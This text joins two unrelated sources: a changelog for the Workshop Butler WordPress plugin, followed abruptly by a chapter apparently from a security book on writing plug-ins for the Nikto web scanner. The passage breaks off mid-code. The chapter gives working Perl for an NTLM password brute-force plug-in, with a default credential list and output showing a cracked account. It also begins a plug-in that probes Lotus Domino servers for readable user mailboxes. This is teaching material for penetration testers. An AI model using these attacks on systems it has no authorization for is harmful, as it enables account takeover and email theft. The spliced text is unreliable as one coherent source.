- Adds two new shortcodes for wsb_schedule: wsb_schedule_date and wsb_schedule_time
- Improves the output for timezones which have no abbreviations (adds GMT before them)
- Adds failed request logging with the ability to switch it off

2.10.0
- Fixes an issue with a non-working registration form for free events
- On the trainer's profile, the newest past events are shown, not the oldest ones
- Improves support for multiple locales

2.9.0
- Adds a 'truncate' parameter to wsb_schedule_title (only for the 'tile' view). By default, 60. Set it to 0 or false to remove truncation completely. "…" is added when truncate is on.
- Adds a 'target' parameter to wsb_event_registration_button. By default, set to '_self'. Possible values are the same as for the 'target' attribute of an HTML link.
- Adds support for optional start/end dates in ticket prices
- Fixes deactivation behaviour for the plugin (does not remove settings anymore)
- Adds complete settings removal when the plugin is uninstalled
- Sends a bit more statistics on each API request

2.8.4
- Fixes a random bug when the workshop ID wasn't retrieved from a query string (probably erased by WordPress)

2.8.3
- Improves handling of secure requests for reverse-proxy websites

2.8.2
- Fixes a bug in Safari preventing card payments

2.8.1
- Fixes an incorrect Stripe key

2.8.0
- Adds support for card payments (card payments must be activated in Workshop Butler)

2.7.6
- Fixes the output of future/past events on a trainer's page: removes private workshops from the list
- Improves the handling of server errors during the registration process

2.7.5
- Fixes the output of future/past events on a trainer's page

2.7.4
- Fixes a bug preventing sending a correct ticket type with multiple tickets
- Fixes a problem with the promo code box not showing when the link is clicked
- Improves the look of the registration form
- Fixes a bug when an external registration link did not work

2.7.3
- Partially fixes an issue where an event page template is not updated

2.7.2
- Fixes an issue with an incomplete list of trainers and events

2.7.1
- Fixes an issue that prevented updating some classes in page templates

2.7.0
- Cleaner, easier-to-use registration form
- Multiple smaller UI fixes
- Adds two new configuration options for the event page: the number of events in the sidebar, and which events to show in the sidebar

2.6.0
- Two new shortcodes added to show the cover image of events: [wsb_schedule_image] and [wsb_event_image]

2.5.0
- Added an 'Event Type' option to the widget. You can show events only from the selected event type
- Added an 'event_type' parameter to the [wsb_schedule] shortcode. You can show events only from the selected event type
- If there is only one ticket type, it's selected automatically on the registration form
- When a user filters workshops in the schedule, this information is saved in the URL so you can share links to a filtered schedule
- Improved the Upcoming events widget on the event page: it shows events of an active trainer and does not show an active event

2.4.1
- Fixes a bug with the registration form

2.4.0
- Improves support for Google Analytics actions
- Fixes a filter configuration on the list of trainers

2.3.1
- Fixes price output for some locales

2.3.0
- Adds support for the Norwegian language
- Fixes the rendering of italic, bold, and text
- G+ is removed from social sharing

2.2.4
- Fixes a bug with an incorrect country code sent to Workshop Butler. As a result, the countries of attendees were not saved correctly

2.2.3
- Fixes an incorrect array initialisation for PHP versions < 5

2.2.2
- Fixes a bug preventing attendee registration when billing and/or work addresses are set as required

2.2.1
- Fixes the rendering of custom fields. Before, labels for custom fields were not shown

2.2.0
- Radically improves mobile templates
- Adds a Trainer column to the Table layout of the Schedule
- Fixes a timezone bug where workshop dates were different from the ones set by trainers
- Fixes a Spanish translation

2.1.3
- Fixes another PHP 5.3 related bug

2.1.2
- Fixes support for PHP 5.3
- Fixes date/time formatting for one-day workshops

2.1.1
- Fixes a bug with incorrect jQuery loading on some websites

2.1.0
- Adds support for WordPress 5.0
- Adds a new shortcode, [wsb_trainer_name]
- Improves the behaviour of external event pages: the links open in new tabs
2.0.2
- Fixes a bug where a ticket price was not showing on some websites
- Moves all classes under the WorkshopButler namespace to prevent name clashes

2.0.1
- Fixes a bug which caused a repetitive menu item

2.0.0

Attention: The changes in this release are substantial and additional manual setup is needed. Before proceeding, read the article on how to migrate to the new WordPress plugin.

Meet a completely new version of our website integration widgets. It includes a huge number of modifications, and makes the process of customisation very simple. Here's just a short list of what we added:

- Powerful new settings allow you to change the layout of pages and update the styles
- Support for Spanish, German, French, Portuguese and Dutch languages
- Support for the list of trainers and trainer profiles
- Support for the list of testimonials for one trainer
- Support for a number of shortcodes and configuration settings

1.2.0
- Support for named widgets, allowing you to add many pre-configured event calendars and sidebars

1.1.0
- Support for the new Workshop Butler website integration

1.0.4
- Added a custom title for the plugin

1.0.3
- Added theme support for the plugin

1.0.2
- Updated the plugin description

1.0.0
- Release date: October 15th, 2016
https://es.wordpress.org/plugins/workshop-butler/
CC-MAIN-2022-33
refinedweb
1,689
55.84
Network Security Tools/Modifying and Hacking Security Tools/Writing Plug-ins for the Nikto Vulnerability Scanner

From WikiContent

Nikto is one of a number of open source security tools available to consultants and administrators. Nikto is a web server scanner, but it can also be used as a CGI scanner. Its purpose is to conduct a series of tests against a web server and to report known vulnerabilities in the server and its applications. The Nikto program is Perl code written and maintained by Chris Sullo. Nikto is regarded as the best in its class, which has earned it the number 16 spot in Fyodor's annual "Top Security Tools" survey, and it is mentioned in numerous books and articles. This chapter will give you an overview of the tool and explain how to extend it by writing your own code in the form of plug-ins and plug-in database entries.

Installing Nikto

Tip: Nikto runs on a variety of operating systems, including Mac OS X, Solaris, Linux, Windows, and many others, as long as a Perl interpreter is installed on the system.

Using Nikto

Using Nikto is fairly straightforward. The main required arguments are the target host and port against which the scan will be conducted. If no port is specified, port 80 (the default) is used. All command-line options except for -debug, -update, -dbcheck, and -verbose are available by using the first letter as a short-form option. Execute the program with no arguments, and a description of all available options along with module-loading warning messages will be displayed. You'll see the warning messages if support modules such as SSL are not installed correctly. Here are the options you have available to you:

- Cgidirs - This allows you to manually set a single CGI directory from which to start all tests. It overrides any of the CGI directory entries made in config.txt. Additionally, it accepts the values all or none. all forces the core plug-in to run checks against every CGI directory specified in config.txt. none runs all CGI checks against the webroot (/).

- cookies - This prints out cookies if the web server attempts to set them.

- evasion+ - LibWhisker lets you apply up to nine different URI obfuscation techniques to each request, with the goal of bypassing intrusion detection systems (IDSes) that do strict signature matching and no URI normalization/conversion. After seeing the evasion options by running Nikto with no arguments, specify as many of these numeric options as you want and they will be applied. For example:

    $perl ./nikto.pl -h -e 3489

- findonly - This does a port scan only; no other checks will be run. If you are port-scanning only, I suggest you use Nmap or some other tool that is dedicated to that task.

- Format - This controls the output format when the -output flag is used. Valid values are htm, csv, and txt. If this option is not used, txt will be used as the default output format.

- generic - This forces all checks in the scan database to be executed, regardless of the web server banner.

- host+ - Use this to specify the target host or a file that contains target entries in the format domain.com:80:443. Each line should contain one entry; any other command-line options such as -ssl will be applied to all the hosts in the file.

- id+ - Use this to specify HTTP Basic authentication credentials in the form username:password:realm. The realm is optional.

- mutate+ - The mutate options are special, in that each integer placed in these options activates a different "conditional" plug-in. For example, by entering 13 you enable the Mutate and Enum_apache plug-ins.

- nolookup - This avoids hostname DNS lookups.

- output+ - This specifies an output filename. The default format is plain text.

- port+ - This is the port the checks will be run against. The default is 80.

- root+ - This prepends a directory to all requests. This is useful for web servers that are configured to redirect all requests to a static virtual directory.

- ssl - This forces use of HTTPS.
On occasion this option is unreliable. A workaround is to use Nikto in combination with an HTTPS proxy agent such as sslproxy, stunnel, or openssl.

- timeout - This is the connection timeout (the default is 10 seconds). If you are on a fast link and are scanning a multitude of hosts, lowering this helps to reduce scan time.

- useproxy - This tells Nikto to use the proxy information defined in config.txt for all requests. At the time of this writing, only HTTP proxies are supported.

- Version - This will print the version of all found plug-ins and databases.

- vhost+ - This sets the virtual host that will be used for the HTTP Host header. This is crucial when scanning a domain that is hosted on a server virtually. To get the most coverage you should run a scan against the web server's IP, and against the domain.

- debug - This enables debug mode, which outputs a large amount of detail regarding every request and response.

- dbcheck - This does a basic syntax check against the scan_database.db and user_scan_database.db databases that the main scanning engine uses.

- update - This retrieves and updates databases and plug-ins, getting the latest version from cirt.net. By default Nikto will never automatically download and install updates; it will prompt the user for acknowledgment.

- verbose - This enables verbose mode.

Nikto Under the Hood

This section traces the logic flow of the entire Nikto program, and discusses the routines available through nikto_core and LibWhisker. The Nikto program structure is modular. Most of Nikto's actual functionality lies within external plug-ins, which you can find in the plugins/ directory where the Nikto source code was uncompressed.

Tip: It is a good idea to browse the source of existing plug-ins to better understand how they work. Execute the following Linux command from the Nikto root directory to generate a tag file for the source tree:

    find . -name "*.pl" -o -name "*.pm" -o -name "*.plugin" | xargs ctags --language-force=perl

Nikto's Program Flow

At 200 lines of code, the nikto.pl file is relatively small. The following paragraphs briefly discuss what the program does on a macro level.

At the start of the program, you'll notice a series of global variables. To avoid namespace collisions, plug-in developers shouldn't use these variable names. Next, load_configs( ) parses the configuration file config.txt and initializes %CONFIG. Then the find_plugins( ) routine searches expected directories for the plug-in files, and sets appropriate values in %FILES. The nikto_core plug-in and LibWhisker are included with the require keyword, which makes all routines from LW.pm and nikto_core.plugin available to the rest of nikto.pl as well as to its plug-ins. The general_config( ) routine parses the command-line options and sets %CLI appropriately. Next, LibWhisker's http_init_request( ) initializes LibWhisker's %request with default values. The proxy_setup( ) function sets the appropriate values in %request, depending upon the proxy settings in the configuration file. The open_output( ) function opens a file handle for writing program output, but only if an output file was specified on the command line. Next, set_targets( ) populates %TARGETS with the hostname or IP address of the target, along with the specified ports. The load_scan_items( ) function loads the vulnerability checks from servers.db, scan_database.db, and user_scan_database.db (if the file exists) into global arrays.

Finally, the main loop for the vulnerability checks is reached. For each item in %TARGETS the following actions are taken. First, dump_target_info( ) displays the target information. Next, check_responses( ) verifies that valid and invalid requests return the HTTP status codes 200 and 404; in addition, this function sets any HTTP Basic authentication credentials specified by the user. The check_cgi( ) function is called to verify the existence of common CGI directories (these can be set in the configuration file). The set_scan_items( ) function is called to process the scan db arrays and to perform macro replacement on the checks. Next, run_plugins( ) is called to execute the plug-ins on the current target host and port. Finally, test_target( ) is called to perform the actual checks found in the scan db arrays.

Nikto's Plug-in Interface

Nikto's plug-in interface is relatively simple. The plug-ins are Perl programs executed by Nikto's run_plugins( ) function. For a plug-in to be executed correctly, it must meet three requirements. First, the plug-in file should use the naming convention nikto_foo.plugin, where foo is the name of the plug-in. Second, the plug-in should have an initialization routine with the same name as the plug-in. And third, the plug-in should have an entry in the file nikto_plugin_order.txt. This file controls which plug-ins run, and in what order. As an example, a line could be added to the file that simply states nikto_foo. This would call the routine nikto_foo( ) within the file nikto_foo.plugin.

To keep the plug-ins portable, you should not use additional modules, but instead copy the needed code into the plug-in itself. A side effect of the chosen plug-in execution method is that the plug-ins and Nikto share the global namespace. This is why you don't need use statements to access Nikto or LibWhisker routines, which simplifies the plug-ins. Plug-in developers should make sure their variable and routine names don't conflict with any of Nikto's global variables.

Existing Nikto Plug-ins

Now let's examine the plug-ins that come bundled with Nikto. This will help you understand how the existing plug-ins function, before you write your own.

- nikto_core - The core plug-in, as the name suggests, contains the core functionality for the main vulnerability-checking routines.
These routines are available for use within the rest of the plug-ins. This plug-in and its exported routines were discussed in detail in the previous section.

- nikto_realms - This plug-in checks whether the web server uses HTTP Basic authentication. If it does, it loads default usernames and passwords and attempts to guess valid credentials.

- nikto_headers - This plug-in iterates through the returned HTTP headers in the server response and reports back any that are interesting from a security perspective; these include X-Powered-By, Content-Location, Servlet-Engine, and DAAP-Server.

- nikto_robots - This plug-in retrieves the robots.txt file if it is available and reports back interesting entries, such as Disallow. The robots.txt file is checked by "friendly" web site crawlers to determine if they should follow any rules when crawling the web site.

- nikto_httpoptions - This plug-in reviews the allowed HTTP methods, as reported via an OPTIONS request to the web server. Dangerous methods include PUT, CONNECT, and DELETE, among others.

- nikto_outdated - This plug-in focuses on the Server HTTP header and uses a "best-guess" parser that determines the web server version, then checks that version against a list of up-to-date web server versions found in the outdated.db file.

- nikto_msgs - As with the nikto_outdated plug-in, this plug-in focuses on the Server HTTP header, but it uses the web server version to determine if there are any version-specific security warnings.

- nikto_apacheusers - This plug-in checks to see if the UserDir option in Apache, or the equivalent in another web server, is enabled. If this option is enabled, you can enumerate valid system users by generating URIs such as /~root for use in requests.

- nikto_mutate - This plug-in is enabled only if -m 1 is specified on the command line. If the MUTATEDIRS and MUTATEFILES variables are set in Nikto's configuration, each request is mutated three times: the first is the standard request, the second has the MUTATEDIRS item prepended to the URI, and the third has a MUTATEFILES entry appended to the URI. You should not use this plug-in with its default settings because the mutation engine is extremely slow.

- nikto_passfiles - This plug-in is enabled only if -m 2 is specified on the command line. This plug-in has an array of common password filenames such as passwd, .htpasswd, etc. It combines the filenames with common file extensions and directory names to make requests in an attempt to check for files with interesting information (usually credentials). Be aware that using this plug-in with its default settings yields more than 2,000 checks.

- nikto_user_enum_apache - This plug-in is enabled only if -m 3 is specified on the command line. This plug-in guesses usernames with the same URI formatting technique as the nikto_apacheusers plug-in. It's not recommended for general use because the default generation engine is set for five-character alphabetic usernames and thus produces 11,881,376 checks.

- nikto_user_enum_cgiwrap - This plug-in is enabled only if -m 4 is specified on the command line. Its logic is very similar to that of the nikto_user_enum_apache plug-in. The key difference is that this plug-in uses an enumeration technique specific to the CGIWrap program. CGIWrap is a web server extension that allows for better security by running CGI scripts as the user that created them instead of as the web server user. The plug-in generates URIs such as /cgi-bin/cgiwrap/userguess. Keeping in mind that the username generation routine is the same as in nikto_user_enum_apache, the same warnings apply.

Adding Custom Entries to the Plug-in Databases

A key advantage of many plug-ins is that you can extend them via their .db data driver files. The msgs, outdated, realms, and core plug-ins all use .db files as their signature database.
Because each plug-in functions differently and has unique requirements for data input, the syntax of each .db file is different. The one common thread among them is that they all use the Comma Separated Value (CSV) format. All of the Nikto plug-ins use the parse_csv( ) routine from the core plug-in to convert each line of a .db file into an array.

.db Files Associated with the nikto_core Plug-in

The nikto_core plug-in uses servers.db to categorize a target based on its Server: header. The file contains categories of web servers and regular expressions that map to them. To limit testing time and false positives, Nikto uses the function get_banner( ) to retrieve the Server: banner and then sets the appropriate server category using the function set_server_cats( ).

The scan_database.db file and the optional user_scan_database.db file are the driver files for the main checks launched from nikto_core.plugin, and they share the same syntax. The line syntax is as follows:

    [Server category], [URI], [Status Code/Search Text], [HTTP Method], [Message]

    "iis","/","Length Required","SEARCH","WebDAV is installed.\n";
    "cern","/.www_acl","200","GET","Contains authorization information"
    "generic","/cfdocs/examples/httpclient/mainframeset.cfm","200!not found","GET","This might be interesting"

The first entry of the first line is the server category—in this case, iis. Once the category has been determined, only checks of this type will be run against the target, unless the -generic command-line option is specified. This reduces total scan time and false positives. The second entry of the first line is the URI requested. The third entry is the text Nikto will look for in the response; if the text is found, the check registers as a vulnerability and the appropriate output is displayed to the user. You can specify both the status code and search text using ! as the separator. The fourth entry is the HTTP method that will be used in the request, typically GET or POST. The fifth entry is the message Nikto should print if the check succeeds.

Note that the check on the first and second lines is similar, except that on the second line the "search text" field is an HTTP response code. If Nikto sees a number in this field, it assumes the number is a response code, and the check succeeds if the actual response code matches the check. You can see a variation of this in the "search text" entry on the third line. The third line specifies both a response code to look for and search text to match against: the check is successful if the response code is 200 and the returned page does not contain the string "not found" (case-sensitive). Look at the following log of the third check. Because the response code was 404 and not 200, the check is known to have failed.

    REQUEST:
    **************
    GET /cfdocs/examples/httpclient/mainframeset.cfm HTTP/1.1\r\n
    Host: 192.168.0.100\r\n
    \r\n

    RESPONSE:
    **************
    HTTP/1.1 404 Not Found\r\n
    Date: Tue, 08 Jun 2004 23:58:30 GMT\r\n
    Server: Apache/1.3.19 (QNX) PHP/4.1.3 mod_ssl/2.6.4 OpenSSL/0.9.6c\r\n
    Transfer-Encoding: chunked\r\n
    Content-Type: text/html; charset=iso-8859-1\r\n
    \r\n
    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<HTML><HEAD>\n<TITLE>404 Not Found</TITLE>\n</HEAD><BODY>\n<H1>Not Found</H1>\nThe requested URL /cfdocs/examples/httpclient/mainframeset.cfm was not found on this server.<P>\n</BODY></HTML>\n

outdated.db for the nikto_outdated Plug-in

The nikto_outdated plug-in, as the name suggests, checks the version of the web server as given by the Server: header to determine if it is outdated. It does this by comparing the retrieved banner to the versions in the outdated.db file. It's important to note that web servers vary in terms of how they announce themselves in the Server: header. It's easy for us to see that Apache/1.3.26-WebDav and apache-1.3.26 php/4.3.1 represent the same version of the Apache web server, but it's challenging for the scanner to see this.
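To make the normalization problem concrete, here is a small, hypothetical sketch that pulls a comparable version number out of two differently formatted Apache banners. It is written in Java purely for illustration; Nikto itself is Perl, and this is not Nikto's parser:

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class BannerVersion {
    // Hypothetical illustration (NOT Nikto's actual code): extract the dotted
    // version number from an Apache Server banner, whatever separator is used.
    static String extractVersion(String banner) {
        Matcher m = Pattern.compile("[Aa]pache[/ -]?(\\d+(?:\\.\\d+)*)").matcher(banner);
        return m.find() ? m.group(1) : null;
    }

    public static void main(String[] args) {
        // Both banners below describe the same Apache 1.3.26:
        System.out.println(extractVersion("Apache/1.3.26-WebDav"));    // 1.3.26
        System.out.println(extractVersion("apache-1.3.26 php/4.3.1")); // 1.3.26
    }
}
```

Once both banners reduce to the same version string, a numeric major/minor comparison against the "Current Version" field becomes straightforward, which is essentially what the plug-in's separator guessing achieves.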
The nikto_outdated plug-in tries to take a best guess as to what the separators are (a space, /, -, etc.) and then translates alphabetic characters to their equivalent ASCII ordinals (as in the debug output a few paragraphs down). The syntax of outdated.db is as follows: [Web Server Banner], [Current Version], [Display Message] "Apache/","Apache/2.0.47","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER). Apache 1.3.28 is still maintained and considered secure." The first entry is the string the plug-in matches on to determine if the current line's checks should be run. The second entry is the version of the web server that is considered up-to-date. The third entry is the message displayed if the version is outdated. The @RUNNING_VER and @CURRENT_VER tokens will be replaced with the strings that their names suggest. The logic flow of the plug-in is best illustrated by putting the program in debug mode using the -debug flag. The debug output shows the plug-in has correctly chosen the / character as a separator to be used in parsing the web server banner. Then it goes on to parse out the version (what Nikto calls numberifcation), and finally it checks major and minor versions of the running version on the target to the Current Version and prints out the Display Message string if the version is outdated. D: nikto_outdated.plugin: verstring: Apache/, sepr:/ D: nikto_outdated.plugin: $CURRENT:apache/2.0.47:$RUNNING:apache/1.3.29: D: nikto_outdated.plugin: $CURRENT:2.0.47:$RUNNING:1.3.29: (after numberifcation) D: nikto_outdated.plugin: major compare: $CUR[0]:2: $RUN[0]:1: + Apache/1.3.29 appears to be outdated (current is at least Apache/2.0.47). Apache 1.3.28 is still maintained and considered secure. realms.db for the nikto_realms Plug-in The realms.db file contains the entries to drive the attacks that the nitko_realms plug-in attempts against a server's Basic Auth HTTP authorization. 
The syntax is as follows:

[Realm], [Username], [Password], [Success Message]

"@ANY","test","test","Generic account discovered."
"ConfigToolPassword",,,"Realm matches a Nokia Checkpoint Firewall-1"

The plug-in checks to see if the realm is matched, and if so, it attempts to authenticate using the Username and Password. On success the message is displayed to the user. The entry @ANY is a wildcard that matches all realms.

server_msgs.db for the nikto_msgs Plug-in

The nikto_msgs plug-in performs matches on the web server banner. If a certain version is found, it will display the corresponding message. One of the benefits of the plug-in's .db file syntax is that it uses Perl regular expressions to match on the banner. The syntax for server_msgs.db is as follows:

[Web Server RegEx], [Success Message]

"Apache\/2\.0\.4[0-5]","Apache versions 2.0.40 through 2.0.45 are vulnerable to a DoS in basic authentication. CAN-2003-0189."

Using LibWhisker

LibWhisker is the Perl module Nikto relies on for its core functionality. At the time of this writing, the current Nikto version ships with LibWhisker 1.7. In general you will not need to use more than a handful of LibWhisker routines. Keep in mind they are all available and have very powerful features, such as crawling, NT Lan Man (NTLM) authentication support, hashing, and encoding. The names of the 69 exported routines can help you understand the kind of functionality the library provides. You can generate a very detailed manual of these routines from LibWhisker itself. To do this, uncompress LibWhisker and run the following commands:

$ cd libwhisker-1.8/scripts/
$ perl func2html.pl < ../LW.pm > LW.pod.htm

In addition to the LibWhisker routines, plug-in developers can also use routines provided by the nikto_core plug-in. Many of these routines are meant for one-time use or for internal use only.
Here are the common routines from LibWhisker and nikto_core that are frequently used by the existing plug-ins, along with a brief description of each:

- fetch - This takes two required parameters and an optional third parameter. The first parameter is the full path of the file to be requested. The second parameter is the HTTP method to use for the request. The optional third parameter is any POST data for the request. The routine makes an HTTP request and returns two scalars: the first returned value is the response code number and the second is the data returned. This routine makes the request using the LibWhisker parameters set by Nikto, so the request is sent to the host that is currently being scanned.
- parse_csv - This takes a single string of comma-separated values as a parameter and returns an array of those items without the commas.
- nprint - This takes one required parameter and one optional parameter. The required parameter is the string to send to output (output depends on what was specified on the command line). The optional parameter prints only if Nikto is run in verbose or debug mode.
- char_escape - This takes one string parameter, escapes all nonalphanumeric characters in it by placing the \ character before them, and returns the result.

If you need a higher level of control over the HTTP requests, you can use the LibWhisker routines. The most commonly used routines for plug-ins are summarized next. The LibWhisker request hash $request{'whisker'} has many values you can set to control the request. These should be returned to their original values if they are changed within a plug-in. See the nikto_headers plug-in as an example of how to do this correctly.

- LW::http_do_request - This takes two parameters: a request hash and a response hash that will be populated accordingly. An optional third parameter is a LibWhisker configs hash. The routine does the work of the actual HTTP request. It returns 0 on success and a nonzero value on error.
- LW::http_fixup_request - This makes sure the request conforms to the HTTP standard. It should be called immediately prior to http_do_request. It takes the request hash as its only parameter.
- LW::http_reset - This resets internal LibWhisker caches and closes existing connections.
- LW::utils_get_dir - This takes a URI as a parameter and returns the base directory, similar to the dirname command on Linux systems.
- LW::utils_normalize_uri - This takes one parameter and resolves any ./ or ../ sequences to get a final, absolute URL.
- LW::auth_set_header - This sets authorization information in the request hash. It takes four required parameters and one optional parameter. The first parameter is either ntlm or basic, the second is the request hash, the third and fourth are the username and password, and the optional parameter is the domain (for ntlm auth).

Writing an NTLM Plug-in for Brute-Force Testing

Brute-forcing is the common attack technique of repeatedly guessing credentials to authenticate to a remote server. Now that we've covered the basics of what is available for plug-in developers, it's time to create an example plug-in that you can use in a real-life network-penetration test scenario. Installations of Microsoft's IIS web server are widely deployed. IIS supports two common authentication schemes. The first is Basic authentication, a nonencrypted legacy form of authentication to a restricted area (the restricted area is known as a realm). The second is NTLM (NT Lan Man) authentication, which authenticates against existing credentials on the Windows operating system. Our new plug-in, named nikto_ntlm.plugin, guesses credentials against this form of authentication. A possible attack strategy would be to guess NTLM credentials to the domain, and then use these credentials to access other remote administration services, such as Terminal Server.
The benefit of this strategy is that with NTLM authentication over HTTP you can guess credentials faster than you can with Terminal Server. (In either case it is important to consider account lockout policies.) First, comment out routines that generate significant traffic. This lets you focus on the specific plug-in when looking through logs and network sniffers during testing. Starting from line 100, our new nikto.pl file that is to be used for plug-in development will look like this:

dump_target_info( );
#check_responses( );
run_plugins( );
#check_cgi( );
#set_scan_items( );
#test_target( );

Our new nikto_plugin_order.txt file for plug-in development will look like this:

#VERSION,1.04
#LASTMOD,05.27.2003
# run the plug-ins in the following order
nikto_ntlm

Now we're ready to code the new plug-in. This plug-in's algorithm is similar to the one found in the nikto_realms plug-in, so we'll use this as a model. First, the plug-in should check to see if it's useful for a particular target. Using fetch automatically fills the LibWhisker request hash with the current target host. Nikto will take care of running the plug-in if the user specifies multiple targets. Note the use of $CLI{root} because this comes into play if the user is using the -root command-line option.

sub nikto_ntlm{
  (my $result, my $CONTENT) = fetch("/$CLI{root}/","GET","");
  if (($result{'www-authenticate'} eq "") ||
      ($result{'www-authenticate'} !~ /^ntlm/i)){
    # we don't do anything for these cases
    return;
  }
  my @CREDS=load_creds("$NIKTO{plugindir}/ntlm.db");

Next, the CREDS array is populated from the results of load_creds( ), which is defined outside of nikto_ntlm( ).
The load_creds( ) routine parses the ntlm.db file and returns an array of arrays containing the credentials that will be used:

sub load_creds{
  my @CREDS;
  my $FILE=shift;
  open(IN,"<$FILE") || die nprint("Can't open $FILE:$!");
  my @contents=<IN>;
  close(IN);
  foreach my $line (@contents) {
    chomp($line);
    if ($line =~ /^\#/) { next; }
    if ($line =~ /\#/) {
      $line=~s/\#.*$//;
      $line=~s/\s+$//;
    }
    if ($line eq "") { next; }
    my @t=parse_csv($line);
    if($#t == 1){
      push(@CREDS,[$t[0],$t[1],undef]);
      nprint("Loaded: $t[0] -- $t[1]","d");
    }elsif($#t == 2){
      push(@CREDS,[@t]);
      nprint("Loaded: $t[2]\\$t[0] -- $t[1]","d");
    }else{
      nprint("Parse error in ntlm.db[".join(",",@t)."]");
    }
  }
  return @CREDS;
}

As you do with other plug-ins, you need an easy way to store and edit the input data for the plug-in, and a typical Nikto database file fits this purpose well. The format for our initial test ntlm.db file is as follows:

#VERSION,1.00
#LASTMOD,07.01.2004
###########################################
# format: <Username>,<Password>,[NT Domain]
###########################################
"admin","admin","TESTDOMAIN"
"administrator","administrator"
"guest","guest"
"test","test"
"testuser","testpass"
"backup","backup"

Now it's time to code the main loop, which will conduct a dictionary-style attack by iterating through the CREDS array and attempting to authenticate with the values from CREDS until it finds a working set of credentials:

foreach my $i (0 ..
$#CREDS){
  nprint("+ trying $CREDS[$i][0] -- $CREDS[$i][1]","v");
  # set NTLM auth creds
  LW::auth_set_header("NTLM",\%request,$CREDS[$i][0],$CREDS[$i][1]);
  LW::http_fixup_request(\%request);
  # test auth
  LW::http_do_request(\%request,\%result);
  if ($result{'www-authenticate'} eq ""){ # found valid credentials
    $VULS++; # increment nikto's global "vulnerabilities found" counter
    if($CREDS[$i][2]){
      nprint("+ NTLM Auth account found user:$CREDS[$i][2]\\$CREDS[$i][0] pass:$CREDS[$i][1]");
    }else{
      nprint("+ NTLM Auth account found user:$CREDS[$i][0] pass:$CREDS[$i][1]");
    }
    last;
  }
} # end foreach
return;
}
1;

When finished, save the file as nikto_ntlm.plugin in the plugins/ directory. Now let's try it out on an example IIS 5.0 server. The output in the following paragraphs is from a server previously scanned with a standard Nikto scan. Nikto reported the "backup" directory as being protected by NTLM authentication. Now try the plug-in using our slightly modified version of Nikto for testing.

C:\tools\nikto_1.32_test>perl nikto.pl -h 10.1.1.12 -root /backup -verbose
-***** SSL support not available (see docs for SSL install instructions) *****
---------------------------------------------------------------------------
- Nikto 1.32/1.19 -
V: - Testing open ports for web servers
V: - Checking for HTTP on port 10.1.1.12:80
+ Target IP: 10.1.1.12
+ Target Hostname: 10.1.1.12
+ Target Port: 80
+ Start Time: Sun Aug 15 21:55:22 2004
---------------------------------------------------------------------------
- Scan is dependent on "Server" string which can be faked, use -g to override
+ Server: Microsoft-IIS/5.0
V: + trying admin -- admin
V: + trying administrator -- administrator
V: + trying guest -- guest
V: + trying test -- test
V: + trying testuser -- testpass
V: + trying backup -- backup
+ NTLM Auth account found user:backup pass:backup
+ 1 host(s) tested

Great! Everything seems to work as expected.
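One practical refinement, given the lockout caveat mentioned earlier, is to slow the loop down between guesses. The standalone Perl sketch below is purely illustrative (the helper name is invented and it is not part of Nikto); inside the plug-in, the same idea would be a single sleep call at the bottom of the foreach loop.

```perl
use strict;
use warnings;

# Hypothetical helper (not Nikto code): walk a credential list
# with a fixed delay between attempts, so that guessing stays
# below typical account-lockout thresholds.
sub throttled_guesses {
    my ($delay, @creds) = @_;
    for my $pair (@creds) {
        my ($user, $pass) = @$pair;
        print "trying $user -- $pass\n";
        sleep $delay if $delay;   # back off between attempts
    }
}

throttled_guesses(0, ["admin", "admin"], ["guest", "guest"]);
```

A delay of even a few seconds per attempt dramatically reduces the chance of tripping a lockout policy, at the cost of a slower scan.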
To use this plug-in as part of the standard Nikto run, uncomment the lines in nikto.pl and revert the plug-in order file, making sure to leave the line for the new plug-in. The plug-in will run only if NTLM authentication is enabled on the web server, because a check was added at the top to verify this before the main brute-forcing routine.

Writing a Standalone Plug-in to Attack Lotus Domino

Lotus Domino servers are commonly deployed for directory and email services. Many versions of the Domino web server ship with world-readable database files with the extension .nsf. These files can contain sensitive information such as password hashes, and at the very least they are a source of information leakage. Of particular interest is the names directory database. If read permissions are enabled on this database, a user (possibly even an unauthenticated user) can view configuration information for the Domino server and domain. The list of users and the paths to their email databases is particularly dangerous. Using this information, an attacker can attempt to view an email database file via an HTTP request to the Domino mail server. If the mail database's permissions are incorrect, the attacker will have read access to that user's email via the web browser! To summarize: combining weak default security permissions with server misconfiguration yields access to a user's email, and in some cases this is possible without authentication. Using these techniques you can write a Nikto plug-in to exploit these vulnerabilities.

This plug-in is going to be different from the other standard Nikto plug-ins because it is intended to work in a standalone manner. The first step in setting it up is to make some of the same modifications to the nikto.pl file that you made for the last plug-in. Comment out test_target( ), set_scan_items( ), and check_responses( ) around line 100 in nikto.pl, and modify nikto_plugin_order.txt so that the only uncommented entry is nikto_domino.
As you did with the first plug-in, you will use a .db file for the plug-in's data source. As mentioned before, the misconfigured permissions on the names database allow us to view all the users associated with a specific mail server. By using the Java applet menu that appears when names.nsf is loaded, you can navigate to Configuration → Messaging → Mail Users, select a mail server that is accessible via HTTP(S), and get a listing of the users and their mail files. By default, only 30 users are listed at a time, but by manipulating the GET parameter Count you can view up to 1,000 users at a time. Use this trick to list large numbers of users per request, and fill the .db file with the informational lines as they are listed in the web browser. When finished, you'll have a list of users, displayed twice per line, along with their mail files. Here are some sample lines from our .db file:

Aaron J Lastname/NA/Manufacturing_Company Aaron J Lastname/NA/Manufacturing_Company@Manufacturing_Company mailsrv54\awoestem9011.nsf
Adam Ant/NA/Manufacturing_Company Adam Ant/NA/Manufacturing_Company@Manufacturing_Company mailsrv58\apanzer2315.nsf

Our attack strategy is simple: make an HTTP request that invokes the OpenView command on each user's email database file. If the request succeeds, the ACL allows read access; otherwise, the ACL is configured correctly. Our next step is to write a routine to process the .db file and extract the email databases:

sub load_users {
  my @MAILFILES;
  my $AFILE=shift;
  open(IN,"<$AFILE") || die nprint("Can't open $AFILE:$!");
  my @file=<IN>;
  close(IN);
  foreach my $line (@file){
    chomp($line);
    next if ($line eq "");
    my @arr = split(/\s/,$line);
    next if $arr[-1] !~ /\.nsf/i;
    $arr[-1] =~ tr/\x5c/\x2f/;
    push(@MAILFILES, $arr[-1]);
    nprint("Loaded: " . $MAILFILES[-1], "d");
  }
  return @MAILFILES;
}

The load_users( ) routine normalizes the path separator and avoids erroneous entries by adding only .nsf entries.
Now write the main loop to request the individual mail files:

sub nikto_dominousers {
  my @MAILFILES=load_users("$NIKTO{plugindir}/domino.users.db");
